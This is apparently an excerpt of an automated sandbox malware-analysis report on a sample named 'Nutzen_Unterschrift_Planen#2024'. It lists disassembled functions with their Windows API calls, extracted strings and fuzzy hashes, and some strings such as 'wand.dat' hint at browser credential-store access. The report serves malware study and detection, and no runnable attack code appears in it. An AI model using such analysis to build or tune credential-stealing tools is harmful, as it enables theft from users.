                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                                            • String ID: </%s>
                                                            • API String ID: 3400436232-259020660
                                                            • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                            • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                            Function 0040E758 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040E770
                                                            • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSendmemset
                                                            • String ID: AE$"
                                                            • API String ID: 568519121-1989281832
                                                            • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                            • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                            • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                            • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                            Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040D58D
                                                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ChildEnumTextWindowWindowsmemset
                                                            • String ID: caption
                                                            • API String ID: 1523050162-4135340389
                                                            • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                            • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                            • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                            • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                            Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                            • String ID: MS Sans Serif
                                                            • API String ID: 210187428-168460110
                                                            • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                            • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                            Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcsicmpmemset
                                                            • String ID: edit
                                                            • API String ID: 2747424523-2167791130
                                                            • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                            • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                            • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                            • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                            Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                            • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                            • API String ID: 3150196962-1506664499
                                                            • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                            • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                            • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                            • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                            Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                            • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                            • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                            • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                            • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memcmp
                                                            • String ID:
                                                            • API String ID: 3384217055-0
                                                            • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                            • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                            • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                            • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                            Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$memcpy
                                                            • String ID:
                                                            • API String ID: 368790112-0
                                                            • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                            • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                            • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                            • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                            Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                              • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                              • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                            • GetMenu.USER32(?), ref: 00410F8D
                                                            • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                            • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                            • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                            • String ID:
                                                            • API String ID: 1889144086-0
                                                            • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                            • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                            • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                            • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                            Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                            • GetLastError.KERNEL32 ref: 0041810A
                                                            • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateErrorHandleLastMappingView
                                                            • String ID:
                                                            • API String ID: 1661045500-0
                                                            • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                            • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                            • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                            • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                            Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                            • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                            Strings
                                                            • sqlite_altertab_%s, xrefs: 0042EC4C
                                                            • virtual tables may not be altered, xrefs: 0042EBD2
                                                            • Cannot add a column to a view, xrefs: 0042EBE8
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                            • API String ID: 1297977491-2063813899
                                                            • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                            • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                            • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                            • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                            Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040560C
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                            • String ID: *.*$dat$wand.dat
                                                            • API String ID: 2618321458-1828844352
                                                            • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                            • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                            Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                            • wcslen.MSVCRT ref: 00410C74
                                                            • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                            • _wcsicmp.MSVCRT ref: 00410CCE
                                                            • _wcsicmp.MSVCRT ref: 00410CDF
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                            • String ID:
                                                            • API String ID: 1549203181-0
                                                            • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                            • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                            • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                            • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                            Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00412057
                                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                            • String ID:
                                                            • API String ID: 3550944819-0
                                                            • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                            • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                            Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • free.MSVCRT ref: 0040F561
                                                            • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                            • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$free
                                                            • String ID: g4@
                                                            • API String ID: 2888793982-2133833424
                                                            • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                            • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                            • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                            • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                            Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                            • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: @
                                                            • API String ID: 3510742995-2766056989
                                                            • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                            • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                            • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                            • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                            Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                            • memset.MSVCRT ref: 0040AF18
                                                            • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@memcpymemset
                                                            • String ID:
                                                            • API String ID: 1865533344-0
                                                            • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                            • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                            • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                            • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                            Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 004144E7
                                                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                              • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                            • memset.MSVCRT ref: 0041451A
                                                            • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                            • String ID:
                                                            • API String ID: 1127616056-0
                                                            • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                            • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                            • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                            • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                            Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
